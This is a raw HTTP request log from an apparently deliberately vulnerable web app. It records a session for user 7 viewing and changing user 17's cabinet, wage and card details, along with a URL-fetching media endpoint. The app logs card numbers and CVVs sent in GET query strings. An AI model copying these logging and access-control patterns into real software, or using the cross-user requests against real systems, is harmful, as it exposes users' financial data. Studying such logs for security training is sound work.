User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Method: GET
[2026-03-04 18:07:10] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
X-Forwarded-Proto: https
Accept: */*
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Referer: https://admin.vulnberries.ru/defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/defect_detail.js
URL: /static/defect_detail.js
Method: GET
[2026-03-04 18:07:10] === HTTP Request ===
[2026-03-04 18:07:10] Defect detail page accessed - defect_id: 681a7a29-68b5-4c85-b15c-8b8462683d26, IP: 172.30.0.12:39706
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
Priority: u=1, i
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/defects
Cookie: auth=sess_1772646490453422354; user_id=7
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
URL: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Method: GET
[2026-03-04 18:07:10] === HTTP Request ===
===================
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/defects
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-04 18:06:59] === HTTP Request ===
[2026-03-04 18:06:59] Defects page accessed - IP: 172.30.0.12:39706
===================
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=17
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /defects
URL: /defects
Method: GET
[2026-03-04 18:06:59] === HTTP Request ===
[2026-03-04 18:06:50] Update Financial Info - user_id: 17, card_number: 1241242412515255, card_holder: sdaasd sad, expiry_date: 1246, cvv: 21
===================
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&card_number=1241242412515255&card_holder=sdaasd+sad&expiry_date=1246&cvv=21
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1241242412515255&card_holder=sdaasd+sad&expiry_date=1246&cvv=21
Method: GET
[2026-03-04 18:06:50] === HTTP Request ===
[2026-03-04 18:06:50] Update Financial Info - user_id: 17, card_number: 1241242412515255, card_holder: sdaasd sad, expiry_date: 1246, cvv: 21
===================
Accept: */*
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/cabinet?user=17
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&card_number=1241242412515255&card_holder=sdaasd+sad&expiry_date=1246&cvv=21
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1241242412515255&card_holder=sdaasd+sad&expiry_date=1246&cvv=21
Method: GET
[2026-03-04 18:06:50] === HTTP Request ===
[2026-03-04 18:06:39] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 2.0 Caddy
Accept: */*
Referer: https://admin.vulnberries.ru/cabinet?user=17
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-04 18:06:39] === HTTP Request ===
[2026-03-04 18:06:39] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-04 18:06:39] === HTTP Request ===
[2026-03-04 18:05:11] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Via: 2.0 Caddy
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-04 18:05:11] === HTTP Request ===
[2026-03-04 18:05:11] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-04 18:05:11] === HTTP Request ===
[2026-03-04 18:04:58] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:39706
===================
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-04 18:04:58] === HTTP Request ===
[2026-03-04 18:04:55] Main page accessed - IP: 172.30.0.12:39706
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/cabinet?user=17
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:04:55] === HTTP Request ===
[2026-03-04 18:04:50] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=1, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-04 18:04:50] === HTTP Request ===
[2026-03-04 18:04:50] Main page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-For: 45.85.105.206
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:04:50] === HTTP Request ===
[2026-03-04 18:04:26] Main page accessed - IP: 172.30.0.12:39706
===================
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/
Priority: u=1, i
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Accept: */*
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:04:26] === HTTP Request ===
[2026-03-04 18:04:25] Main page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /
URL: /
Method: GET
[2026-03-04 18:04:25] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Dest: script
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-04 18:04:12] === HTTP Request ===
[2026-03-04 18:04:12] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:39706
===================
Via: 2.0 Caddy
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-04 18:04:12] === HTTP Request ===
[2026-03-04 18:03:10] Login page accessed - IP: 172.30.0.12:39706
===================
Upgrade-Insecure-Requests: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /login
URL: /login
Method: GET
[2026-03-04 18:03:10] === HTTP Request ===
[2026-03-04 18:03:10] Login page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Priority: u=0, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-For: 45.85.105.206
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1772646490453422354; user_id=7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /login
URL: /login
Method: GET
[2026-03-04 18:03:10] === HTTP Request ===
[2026-03-04 18:03:09] Login page accessed - IP: 172.30.0.12:39706
===================
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
X-Forwarded-For: 45.85.105.206
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /login
URL: /login
Method: GET
[2026-03-04 18:03:09] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: image
Cookie: auth=sess_1772646490453422354; user_id=7
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 18:02:53] === HTTP Request ===
[2026-03-04 18:02:53] Login page accessed - IP: 172.30.0.12:39706
===================
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=0, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Cookie: auth=sess_1772646490453422354; user_id=7
Sec-Fetch-Dest: document
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /login
URL: /login
Method: GET
[2026-03-04 18:02:53] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Referer: https://admin.vulnberries.ru/
Priority: u=1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: */*
X-Forwarded-Proto: https
Cookie: auth=sess_1772646490453422354; user_id=7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39686
Path: /static/app.js
URL: /static/app.js
Method: GET
